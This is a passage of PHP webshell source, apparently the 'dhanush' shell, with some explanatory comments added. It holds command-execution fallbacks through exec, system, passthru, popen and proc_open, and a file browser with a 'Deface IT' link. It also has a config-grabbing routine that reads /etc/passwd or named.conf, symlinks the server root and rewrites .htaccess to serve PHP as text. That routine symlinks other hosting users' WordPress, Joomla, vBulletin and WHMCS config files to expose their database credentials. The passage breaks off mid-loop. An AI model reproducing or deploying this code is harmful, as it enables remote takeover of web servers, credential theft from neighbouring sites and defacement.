 } elseif (function_exists('passthru')) {
 ob_start();
 @passthru($in);
 $out = ob_get_clean();
 } elseif (function_exists('system')) {
 ob_start();
 @system($in);
 $out = ob_get_clean();
 } elseif (function_exists('shell_exec')) {
 $out = shell_exec($in);
 } elseif (is_resource($f = @popen($in,"r"))) {
 $out = "";
 while(!@feof($f))
 $out .= fread($f,1024);
 pclose($f);
 }
 return $out;
}
// Second command-execution fallback chain (the first is myexe() above), with
// a different order: exec(), shell_exec(), popen(), system(), passthru(),
// proc_open(). Output is HTML-escaped before being returned, so callers
// embed it directly in the page.
// Hardening note: as with myexe(), only disabling every one of these
// primitives together (plus popen/proc_open) prevents this function from
// running commands.
function exec_all($command)
 {
 
 $output = '';
 if(function_exists('exec'))
 {
 exec($command,$output);
 $output = join("\n",$output);
 }
 
 else if(function_exists('shell_exec'))
 {
 $output = shell_exec($command);
 }
 
 else if(function_exists('popen'))
 {
 $handle = popen($command , "r"); // Open the command pipe for reading
 if(is_resource($handle))
 {
 if(function_exists('fread') && function_exists('feof'))
 {
 while(!feof($handle))
 {
 $output .= fread($handle, 512);
 }
 }
 else if(function_exists('fgets') && function_exists('feof'))
 {
 while(!feof($handle))
 {
 $output .= fgets($handle,512);
 }
 
 
 
 }
 }
 pclose($handle);
 }
 
 
 else if(function_exists('system'))
 {
 ob_start(); // start output buffering
 system($command);
 $output = ob_get_contents(); // Get the output
 ob_end_clean(); // Stop output buffering
 }
 
 else if(function_exists('passthru'))
 {
 ob_start(); // start output buffering
 passthru($command);
 $output = ob_get_contents(); // Get the output
 ob_end_clean(); // Stop output buffering
 }
 
 else if(function_exists('proc_open'))
 {
 $descriptorspec = array(
 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
 );
 $handle = proc_open($command ,$descriptorspec , $pipes); // the child's stdout pipe lands in $pipes[1]
 if(is_resource($handle))
 {
 if(function_exists('fread') && function_exists('feof'))
 {
 while(!feof($pipes[1]))
 {
 $output .= fread($pipes[1], 512);
 }
 }
 else if(function_exists('fgets') && function_exists('feof'))
 {
 while(!feof($pipes[1]))
 {
 $output .= fgets($pipes[1],512);
 }
 }
 }
 pclose($handle);
 }
 
 // Escaped for direct embedding in the HTML response.
 return(htmlspecialchars($output));
 
}
1900
// Two display strings for the info panel: whether open_basedir is configured,
// and whether /etc/passwd is readable by the web-server user.
$openBaseDirSetting = ini_get("open_basedir");
if ($openBaseDirSetting or strtoupper($openBaseDirSetting) == "ON") {
    $basedir = "<font class=txt>ON</font>";
} else {
    $basedir = "OFF";
}
$etc_passwd = "No";
if (@is_readable("/etc/passwd")) {
    $etc_passwd = "Yes";
}
1903
/**
 * Owner/group label for a path, as shown in the directory listing.
 *
 * With the POSIX extension present the path's owner and group names are
 * looked up. Without it the label falls back to the uid/gid of the running
 * script itself (not of $value), which is what this function has always
 * displayed in that case.
 *
 * @param string $value Path whose owner/group is wanted.
 * @return string "name / group" with POSIX, otherwise "uid/gid".
 */
function getOGid($value)
{
    if (function_exists('posix_getegid')) {
        $ownerEntry = @posix_getpwuid(@fileowner($value));
        $groupEntry = @posix_getgrgid(@filegroup($value));
        return $ownerEntry['name'] . " / " . $groupEntry['name'];
    }
    // No POSIX functions: report the script's own uid/gid instead.
    return @getmyuid() . "/" . @getmygid();
}
// Fallback for PHP builds without scandir(): read the directory with
// opendir()/readdir(). Behaviour kept as-is: returns the entries in readdir
// order, null (the never-assigned $names) when nothing was read, and leaves
// the handle open.
if (!function_exists("scandir")) {
    function scandir($dir)
    {
        $handle = opendir($dir);
        for (;;) {
            $entry = readdir($handle);
            if ($entry === false) {
                break;
            }
            $names[] = $entry;
        }
        return $names;
    }
}
// Directory-listing view of this webshell. Reads $dir with readdir(), lists
// directories first then files, and renders a form whose per-row controls call
// the page's JavaScript helpers (changedir / fileaction / defacefun /
// myaction). Globals: $ind (the deface page; when non-empty an index.php or
// index.html row gets a "Deface IT" link), $directorysperator, $os.
// Rows for the shell itself, index.php/index.html, config.php and
// wp-config.php are highlighted in red — these are the targets this UI
// nudges the operator toward, which is worth knowing when reviewing access
// logs for the `dir=` parameter.
function mainfun($dir)
{
 global $ind, $directorysperator,$os;
 
 // $pdir and $countfiles below are computed but never used.
 $mydir = basename(dirname(__FILE__));
 $pdir = str_replace($mydir,"",$dir);
 $pdir = str_replace("/","",$dir);
 
 $files = array();
 $dirs = array();
 
 $odir=opendir($dir);
 // Loop condition is truthiness, so an entry literally named "0" ends the listing.
 while($file = readdir($odir))
 {
 if(is_dir($dir.'/'.$file))
 {
 $dirs[]=$file;
 }
 else
 {
 $files[]=$file;
 }
 }
 $countfiles = count($dirs) + count($files);
 $dircount = count($dirs);
 $dircount = $dircount-2; // "." and ".." were counted as directories
 $myfiles = array_merge($dirs,$files);
 $i = 0;
 if(is_dir($dir))
 {
 if(scandir($dir) === false)
 echo "<center><font size=3>Directory isn't readable</font></center>";
 else
 {
?><form method="post" id="myform" name="myform">
 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
 <tr><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
 <tr height:12px;">
 <th>Name</th>
 <th>Size</th>
 <th>Permissions</th>
 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
 <th>Modification Date</th>
 <th>Rename</th>
 <th>Download</th>
 <th style="width:2%;">Action</th>
 </tr>
 <?php
 // First pass: only the "." and ".." rows.
 foreach($myfiles as $val)
 {
 $vv = addslashes($dir . $directorysperator . $val);
 $i++;
 if($val == ".")
 {
 ?><tr class=lines><td><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
 
 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($dir)."</font></td>";
 }
 ?>
 
 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
 <td></td><td></td><td></td></</tr><?php
 // (the "</</tr>" above is emitted as-is)
 }
 else if($val == "..")
 {
 // Trail() is defined elsewhere in this file; it yields the parent path.
 $val = Trail($dir . $directorysperator . $val,$directorysperator);
 $vv = addslashes($val);
 if(empty($vv))
 $vv = "/"; ?>
 <tr class=lines><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($val)."</font></td>";
 
 } ?>
 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
 <td></td><td></td><td></td></tr><?php continue;
 }
 }
 // Second pass: every real entry. Note getOGid() below receives the bare
 // name $val, not the full path, so that lookup resolves against the CWD.
 foreach($myfiles as $val)
 {
 $vv = addslashes($dir . $directorysperator . $val);
 $i++;
 
 if(is_dir($vv))
 {
 if($val == "." || $val == "..")
 continue; ?>
 <tr class=lines>
 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
 <td class='info'><font size=2>DIR</font></td>
 
 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($val)."</font></td>";
 } ?>
 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
 <td></td>
 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
 </tr></font>
 <?php
 }
 else if(is_file($vv))
 {
 // $self is not declared global in this function, so the Download href
 // below reduces to "?download=...", which the browser resolves against
 // the current page.
 ?>
 <tr class=lines>
 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
 
 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
 
 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
 
 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($val)."</font></td>";
 } ?>
 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
 
 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
 </tr>
 <p>
 <?php
 }
 }
 
 // The "if(class_exists('ZipArchive'))" text below sits inside the string
 // literal, so it is emitted verbatim into the HTML rather than evaluated;
 // both Compress and Uncompress options are always rendered.
 echo "</table>
<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
<select class=sbox name=choice style='width: 100px;'>
 <option value=delete>Delete</option>
 <option value=chmod>Change mode</option>
 if(class_exists('ZipArchive'))
 { <option value=compre>Compress</option>
 <option value=uncompre>Uncompress</option> }
 </select>
 
 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
 }}
 else
 {
 // $_GET['dir'] is echoed back unescaped.
 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
 }
 
}
2086if(isset($_REQUEST["script"]))
2087{
2088 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
2089 ?>
2090 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('scserver')"><font class=txt size="4">| Use Server |</font></a></td>
2091 <td><a href=javascript:void(0) onClick="getdata('scphp')"><font class=txt size="4">| Use PHP |</font></a></td>
2092 </tr></table></center>
2093 <?php
2094}
2095elseif(isset($_REQUEST["scserver"]))
2096{
2097 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('servermanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2098 <td><a href=javascript:void(0) onClick="getdata('serverscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2099 </tr></table></center><?php
2100}
2101else if(isset($_REQUEST['servermanuallyscript']))
2102{
2103 ?>
2104 <center>
2105 <form action="<?php echo $self; ?>" method="post">
2106 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2107 <input type="button" OnClick="manuallyscriptfn('serverscriptlocator',passwd.value)" value="Get Config" class="but">
2108 </form>
2109 </center>
2110 <?php
2111}
2112elseif(isset($_REQUEST['serverscriptlocator']))
2113{
2114 if($os != "Windows")
2115 {
2116 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2117 $path=explode('/',$url);
2118 $url =str_replace($path[count($path)-1],'',$url);
2119 if(isset($_REQUEST['passwd']))
2120 {
2121 $getetc = trim($_REQUEST['passwd']);
2122
2123 mkdir("dhanushSPT");
2124 chdir("dhanushSPT");
2125
2126 $myfile = fopen("test.txt","w");
2127
2128 fputs($myfile,$getetc);
2129 fclose($myfile);
2130 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Username</font></td><td align=center><font size=4 >Script</font></td></tr>";
2131 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2132 while(!feof($file))
2133 {
2134 $s = fgets($file);
2135 $matches = array();
2136 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2137 $matches = str_replace("home/","",$matches[1]);
2138 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2139 $headers=get_headers($hs_status);
2140 if(strpos($headers[0],'200') == true )
2141 $hs_script = "Wordpress";
2142 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2143 $headers=get_headers($hs_status);
2144 if(strpos($headers[0],'200') == true )
2145 $hs_script = "Wordpress";
2146 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2147 $headers=get_headers($hs_status);
2148 if(strpos($headers[0],'200') == true )
2149 $hs_script = "Joomla";
2150 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2151 $headers=get_headers($hs_status);
2152 if(strpos($headers[0],'200') == true )
2153 $hs_script = "Vbulletin";
2154 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2155 $headers=get_headers($hs_status);
2156 if(strpos($headers[0],'200') == true )
2157 $hs_script = "Vbulletin";
2158 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2159 $headers=get_headers($hs_status);
2160 if(strpos($headers[0],'200') == true )
2161 $hs_script = "Mybb";
2162 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2163 $headers=get_headers($hs_status);
2164 if(strpos($headers[0],'200') == true )
2165 $hs_script = "IPB";
2166 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2167 $headers=get_headers($hs_status);
2168 if(strpos($headers[0],'200') == true )
2169 $hs_script = "SMF";
2170 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2171 $headers=get_headers($hs_status);
2172 if(strpos($headers[0],'200') == true )
2173 $hs_script = "WHMCS";
2174 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2175 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2176 $dcount++;
2177 }
2178 echo "</table>";
2179 fclose($file);
2180 unlink("test.txt");
2181 }
2182 else
2183 {
2184 $d0mains = @file("/etc/named.conf");
2185 if($d0mains)
2186 {
2187 @mkdir("dhanush",0777);
2188 @chdir("dhanush");
2189 execmd("ln -s / root");
2190 $file3 = 'Options all
2191 DirectoryIndex Sux.html
2192 AddType text/plain .php
2193 AddHandler server-parsed .php
2194 AddType text/plain .html
2195
2196
2197
2198 AddHandler txt .html
2199 Require None
2200 Satisfy Any
2201 ';
2202 $fp3 = fopen('.htaccess','w');
2203 $fw3 = fwrite($fp3,$file3);
2204 @fclose($fp3);
2205 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Site</font></td><td align=center><font size=4 >Script</font></td></tr>";
2206 $dcount = 1;
2207 foreach($d0mains as $d0main)
2208 {
2209 if(eregi("zone",$d0main))
2210 {
2211 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2212 flush();
2213
2214 if(strlen(trim($domains[1][0])) > 2)
2215 {
2216 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2217 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/wp-config.php";
2218 $headers=get_headers($hs_status);
2219 if(strpos($headers[0],'200') == true )
2220 $hs_script = "Wordpress";
2221 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/blog/wp-config.php";
2222 $headers=get_headers($hs_status);
2223 if(strpos($headers[0],'200') == true )
2224 $hs_script = "Wordpress";
2225 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/configuration.php";
2226 $headers=get_headers($hs_status);
2227 if(strpos($headers[0],'200') == true )
2228 $hs_script = "Joomla";
2229 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/forum/includes/config.php";
2230 $headers=get_headers($hs_status);
2231 if(strpos($headers[0],'200') == true )
2232 $hs_script = "Vbulletin";
2233 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/core/includes/config.php";
2234 $headers=get_headers($hs_status);
2235 if(strpos($headers[0],'200') == true )
2236 $hs_script = "Vbulletin";
2237 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/inc/config.php";
2238 $headers=get_headers($hs_status);
2239 if(strpos($headers[0],'200') == true )
2240 $hs_script = "Mybb";
2241 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/conf_global.php";
2242 $headers=get_headers($hs_status);
2243 if(strpos($headers[0],'200') == true )
2244 $hs_script = "IPB";
2245 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/settings.php";
2246 $headers=get_headers($hs_status);
2247 if(strpos($headers[0],'200') == true )
2248 $hs_script = "SMF";
2249 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/submitticket.php";
2250 $headers=get_headers($hs_status);
2251 if(strpos($headers[0],'200') == true )
2252 $hs_script = "WHMCS";
2253 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td><a href=".$domains[1][0]." target='_blank'><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt><a href=".$hs_status." target=_blank>".$hs_user."</a></font></td></tr>"; flush();
2254
2255 $dcount++;
2256 }
2257 }
2258
2259 }
2260 echo "</table>";
2261 }
2262 else
2263 {
2264 $TEST=@file('/etc/passwd');
2265 if ($TEST)
2266 {
2267 @mkdir("dhanush",0777);
2268 @chdir("dhanush");
2269 execmd("ln -s / root");
2270 $file3 = 'Options all
2271 DirectoryIndex Sux.html
2272 AddType text/plain .php
2273 AddHandler server-parsed .php
2274 AddType text/plain .html
2275 AddHandler txt .html
2276 Require None
2277 Satisfy Any
2278 ';
2279 $fp3 = fopen('.htaccess','w');
2280 $fw3 = fwrite($fp3,$file3);
2281 @fclose($fp3);
2282
2283 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2284
2285 $dcount = 1;
2286 $file = fopen("/etc/passwd", "r");
2287 //Output a line of the file until the end is reached
2288 while(!feof($file))
2289 {
2290 $s = fgets($file);
2291 $matches = array();
2292 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2293 $matches = str_replace("home/","",$matches[1]);
2294 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2295 $headers=get_headers($hs_status);
2296 if(strpos($headers[0],'200') == true )
2297 $hs_script = "Wordpress";
2298 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2299 $headers=get_headers($hs_status);
2300 if(strpos($headers[0],'200') == true )
2301 $hs_script = "Wordpress";
2302 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2303 $headers=get_headers($hs_status);
2304 if(strpos($headers[0],'200') == true )
2305 $hs_script = "Joomla";
2306 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2307 $headers=get_headers($hs_status);
2308 if(strpos($headers[0],'200') == true )
2309 $hs_script = "Vbulletin";
2310 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2311 $headers=get_headers($hs_status);
2312 if(strpos($headers[0],'200') == true )
2313 $hs_script = "Vbulletin";
2314 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2315 $headers=get_headers($hs_status);
2316 if(strpos($headers[0],'200') == true )
2317 $hs_script = "Mybb";
2318 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2319 $headers=get_headers($hs_status);
2320 if(strpos($headers[0],'200') == true )
2321 $hs_script = "IPB";
2322 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2323 $headers=get_headers($hs_status);
2324 if(strpos($headers[0],'200') == true )
2325 $hs_script = "SMF";
2326 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2327 $headers=get_headers($hs_status);
2328 if(strpos($headers[0],'200') == true )
2329 $hs_script = "WHMCS";
2330 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2331 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2332 $dcount++;
2333 }
2334 fclose($file);
2335
2336 echo "</table>";
2337 }
2338 else
2339 {
2340 @mkdir("dhanush",0777);
2341 @chdir("dhanush");
2342 execmd("ln -s / root");
2343 $file3 = 'Options all
2344 DirectoryIndex Sux.html
2345 AddType text/plain .php
2346 AddHandler server-parsed .php
2347 AddType text/plain .html
2348 AddHandler txt .html
2349 Require None
2350 Satisfy Any
2351 ';
2352 $fp3 = fopen('.htaccess','w');
2353 $fw3 = fwrite($fp3,$file3);
2354 @fclose($fp3);
2355 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2356 $temp = "";
2357 $val1 = 0;
2358 $val2 = 1000;
2359 for(;$val1 <= $val2;$val1++)
2360 {
2361 $uid = @posix_getpwuid($val1);
2362 if ($uid)
2363 $temp .= join(':',$uid)."\n";
2364 }
2365 echo '<br/>';
2366 $temp = trim($temp);
2367
2368 $file5 = fopen("test.txt","w");
2369 fputs($file5,$temp);
2370 fclose($file5);
2371
2372 $dcount = 1;
2373 $file = fopen("test.txt", "r");
2374 while(!feof($file))
2375 {
2376 $s = fgets($file);
2377 $matches = array();
2378 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2379 $matches = str_replace("home/","",$matches[1]);
2380 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2381 $headers=get_headers($hs_status);
2382 if(strpos($headers[0],'200') == true )
2383 $hs_script = "Wordpress";
2384 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2385 $headers=get_headers($hs_status);
2386 if(strpos($headers[0],'200') == true )
2387 $hs_script = "Wordpress";
2388 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2389 $headers=get_headers($hs_status);
2390 if(strpos($headers[0],'200') == true )
2391 $hs_script = "Joomla";
2392 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2393 $headers=get_headers($hs_status);
2394 if(strpos($headers[0],'200') == true )
2395 $hs_script = "Vbulletin";
2396 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2397 $headers=get_headers($hs_status);
2398 if(strpos($headers[0],'200') == true )
2399 $hs_script = "Vbulletin";
2400 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2401 $headers=get_headers($hs_status);
2402 if(strpos($headers[0],'200') == true )
2403 $hs_script = "Mybb";
2404 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2405 $headers=get_headers($hs_status);
2406 if(strpos($headers[0],'200') == true )
2407 $hs_script = "IPB";
2408 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2409 $headers=get_headers($hs_status);
2410 if(strpos($headers[0],'200') == true )
2411 $hs_script = "SMF";
2412 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2413 $headers=get_headers($hs_status);
2414 if(strpos($headers[0],'200') == true )
2415 $hs_script = "WHMCS";
2416 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2417 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2418 $dcount++;
2419 }
2420 fclose($file);
2421 echo "</table>";
2422 unlink("test.txt");
2423 }
2424 }
2425 }
2426 }
2427 else
2428 echo "<center>Cannot Get Scripts</center>";
2429}
2430elseif(isset($_REQUEST["scphp"]))
2431{
2432 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('phpmanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2433 <td><a href=javascript:void(0) onClick="getdata('phpscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2434 </tr></table></center><?php
2435}
2436else if(isset($_REQUEST['phpmanuallyscript']))
2437{
2438 ?>
2439 <center>
2440 <form action="<?php echo $self; ?>" method="post">
2441 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2442 <input type="button" OnClick="manuallyscriptfn('phpscriptlocator',passwd.value)" value="Get Config" class="but">
2443 </form>
2444 </center>
2445 <?php
2446}
2447else if(isset($_REQUEST['phpscriptlocator']))
2448{
2449 if($os == "Linux")
2450 {
2451 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2452 $path=explode('/',$url);
2453 $url =str_replace($path[count($path)-1],'',$url);
2454 function syml($usern,$pdomain)
2455 {
2456 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2457 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2458 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2459 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2460 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2461 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
2462 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2463 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2464 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
2465 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2466 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2467 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2468 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2469 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2470 symlink('/home/'.$usern.'/public_html/bb-config.php',$pdomain.'~~boxbilling.txt');
2471 symlink('/home/'.$usern.'/public_html/billing/bb-config.php',$pdomain.'~~boxbilling.txt');
2472 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2473 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2474 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2475 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2476 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2477 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2478 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2479 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2480 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2481 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
2482 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
2483 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2484 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
2485 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
2486 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2487 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
2488 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2489 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2490 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2491 }
2492 if(isset($_REQUEST['passwd']))
2493 {
2494 $getetc = trim($_REQUEST['passwd']);
2495
2496 mkdir("dhanushSPT");
2497 chdir("dhanushSPT");
2498 $file3 = 'Options all
2499 DirectoryIndex Sux.html
2500 AddType text/plain .php
2501 AddHandler server-parsed .php
2502 AddType text/plain .html
2503 AddHandler txt .html
2504 Require None
2505 Satisfy Any
2506 ';
2507 $fp3 = fopen('.htaccess','w');
2508 $fw3 = fwrite($fp3,$file3);
2509 @fclose($fp3);
2510 $myfile = fopen("test.txt","w");
2511 fputs($myfile,$getetc);
2512 fclose($myfile);
2513
2514 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2515 while(!feof($file))
2516 {
2517 $s = fgets($file);
2518 $matches = array();
2519 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2520 $matches = str_replace("home/","",$matches[1]);
